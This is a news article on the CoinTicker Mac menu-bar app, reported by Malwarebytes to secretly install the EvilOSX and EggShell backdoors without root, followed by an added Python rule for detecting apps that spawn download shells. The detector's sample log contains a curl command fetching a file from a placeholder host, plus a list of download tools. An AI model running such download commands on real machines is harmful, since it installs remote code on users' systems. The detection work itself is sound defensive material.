The CoinTicker Mac application contains malware that can steal coins

CoinTicker, a Mac application that displays the current price of Bitcoin and other cryptocurrencies in your menu bar, has been found to contain two separate pieces of malware.


Malwarebytes shared the news on its blog after a member of its forum noticed suspicious behavior.

The CoinTicker application discreetly installs not one but two backdoors.

Without any visible sign of trouble, such as a request for root authentication, there is nothing to tell the user that something is wrong.

Once launched, however, the application downloads and installs the components of two different open-source backdoors: EvilOSX and EggShell.

The application runs a shell command to download a customized version of the EggShell server compiled for macOS.

Analysis of the malware does not reveal exactly what it is meant to do, the company says; it essentially plants backdoors that could be exploited in many different ways.

Although we do not know exactly what the hacker behind this malware wants to do, EggShell and EvilOSX are both broad-spectrum backdoors that can be used for a variety of purposes. Since the malware is distributed via a cryptocurrency application, it seems likely that it is intended to access users' cryptocurrency wallets for the purpose of stealing coins.

At first, it looked like a supply chain attack, in which the website of a legitimate application is hacked to distribute a malicious version of the application. […] However, after further inspection, it seems that this application has probably never been legitimate. First, the application is distributed via a domain named coin-sticker.com. This is close to the name of the application, but not quite. Getting the domain name wrong would be a terrible blunder for a legitimate application. Adding even more suspicion, it seems that this domain was registered only a few months ago, on July 13th.

Malwarebytes says that CoinTicker serves as a warning that nasty things can be done without root privileges.

An interesting note about this malware is that none of it requires anything more than normal user permissions. Root permissions are not necessary. There is often a misplaced emphasis on malware needing root privileges, but this malware is a perfect demonstration that malware does not need such privileges to be high risk.
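The behavior described above (a menu-bar app that, once launched, spawns a shell to download a backdoor, all under the ordinary user account) is the kind of thing an endpoint telemetry rule can catch. The following is an added example, not code from Malwarebytes or from the article: it parses constructed process-execution records in an assumed `pid=… ppid=… uid=… path=… cmd="…"` format, flags a shell spawned by a GUI app bundle that invokes a download tool against a URL, and records whether the activity ran as root. The app name `ExampleTicker` and the host `example.invalid` are placeholders, and the set of download tools is an assumption.

```python
"""Flag GUI app bundles that spawn a shell to download something over the network.

Added example: the log format below is constructed for illustration and the
app/host names are placeholders, not indicators from the CoinTicker case.
"""
import re
from dataclasses import dataclass

# Assumed set of tools a download-and-install shell command would call.
DOWNLOADERS = {"curl", "wget", "python", "python3", "osascript"}
SHELLS = {"sh", "bash", "zsh"}

# Constructed process-execution records (not real telemetry).
SAMPLE_LOG = """
pid=100 ppid=1 uid=501 path=/Applications/ExampleTicker.app/Contents/MacOS/ExampleTicker cmd="ExampleTicker"
pid=101 ppid=100 uid=501 path=/bin/sh cmd="sh -c curl -fsSL http://example.invalid/server -o /tmp/server"
pid=200 ppid=1 uid=501 path=/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal cmd="Terminal"
pid=201 ppid=200 uid=501 path=/bin/zsh cmd="zsh -c ls -la"
pid=300 ppid=1 uid=0 path=/usr/libexec/helper cmd="helper"
pid=301 ppid=300 uid=0 path=/bin/sh cmd="sh -c curl http://example.invalid/x"
"""

LINE_RE = re.compile(r'pid=(\d+) ppid=(\d+) uid=(\d+) path=(\S+) cmd="(.*)"$')


@dataclass(frozen=True)
class Exec:
    pid: int
    ppid: int
    uid: int
    path: str
    cmdline: str


def parse_log(text: str) -> list[Exec]:
    """Parse the constructed record format; unknown lines raise ValueError."""
    events = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            raise ValueError(f"unrecognised record: {line!r}")
        events.append(Exec(int(m[1]), int(m[2]), int(m[3]), m[4], m[5]))
    return events


def is_app_bundle(path: str) -> bool:
    """True for executables living inside a macOS .app bundle."""
    return ".app/Contents/MacOS/" in path


def basename(path: str) -> str:
    return path.rsplit("/", 1)[-1]


def find_suspicious(events: list[Exec]) -> list[dict]:
    """Return shells spawned by an app bundle that fetch a URL with a download tool."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None or not is_app_bundle(parent.path):
            continue
        if basename(e.path) not in SHELLS:
            continue
        tokens = set(re.findall(r"[A-Za-z0-9_.-]+", e.cmdline))
        if tokens & DOWNLOADERS and re.search(r"https?://", e.cmdline):
            hits.append({
                "app": parent.path,
                "uid": e.uid,
                "as_root": e.uid == 0,  # the point: this is usually False
                "cmd": e.cmdline,
            })
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(parse_log(SAMPLE_LOG)):
        print(f"uid={hit['uid']} root={hit['as_root']} app={hit['app']}\n  {hit['cmd']}")
```

Run against the sample, only the ticker app's child shell is reported; the Terminal session running `ls` and the root-owned helper (whose parent is not an app bundle) are not. The `as_root` field is deliberately part of the output so that a triage rule never gates on it: as the article stresses, uid 501 is all this kind of malware needs.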

As always, it is advisable to only install applications from trusted sources.

Via TNW. Picture: Shutterstock.
